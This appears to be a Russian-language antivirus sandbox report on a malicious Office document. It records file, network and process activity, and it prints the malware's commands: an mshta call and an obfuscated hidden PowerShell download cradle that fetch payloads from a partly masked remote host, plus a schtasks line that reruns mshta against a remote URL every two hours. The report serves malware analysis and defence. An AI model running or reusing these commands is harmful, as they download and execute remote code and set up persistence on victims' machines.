Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\cdtcomecu
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im WINWORD.EXE
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' "http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/0.mp3"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/1.txt...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\dat5ffa.tmp
Удаляет следующие файлы
- %TEMP%\dat5ffa.tmp
Сетевая активность
Подключается к
- 'dr########3.hospedagemdesites.ws':80
TCP
Запросы HTTP GET
- http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/0.mp3
UDP
- DNS ASK dr########3.hospedagemdesites.ws
Другое
Ищет следующие окна
- ClassName: '' WindowName: 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'
- ClassName: '' WindowName: ''
Запускает на исполнение
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 120 /tn "CDTcomeCU" /tr "\"<SYSTEM32>\mshta.exe\"http://ho###nuve.com/erro.crt" /F
- '<SYSTEM32>\cmd.exe' /C taskkill /f /im WINWORD.EXE & exit" /F
